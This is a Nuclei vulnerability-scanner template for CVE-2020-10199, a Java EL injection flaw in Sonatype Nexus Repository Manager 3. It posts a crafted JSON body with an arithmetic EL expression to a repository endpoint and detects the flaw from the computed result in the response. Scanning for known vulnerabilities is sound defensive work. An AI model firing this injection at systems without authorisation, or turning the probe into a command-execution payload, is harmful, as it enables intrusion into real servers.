nuclei-templates/cves/2020/CVE-2020-10199.yaml

28 lines
839 B
YAML

id: cve-2020-10199
info:
name: Nexus Repository Manager 3 RCE
author: hetroublemakr
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/rest/beta/repositories/go/group'
headers:
Content-Type: application/json
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 400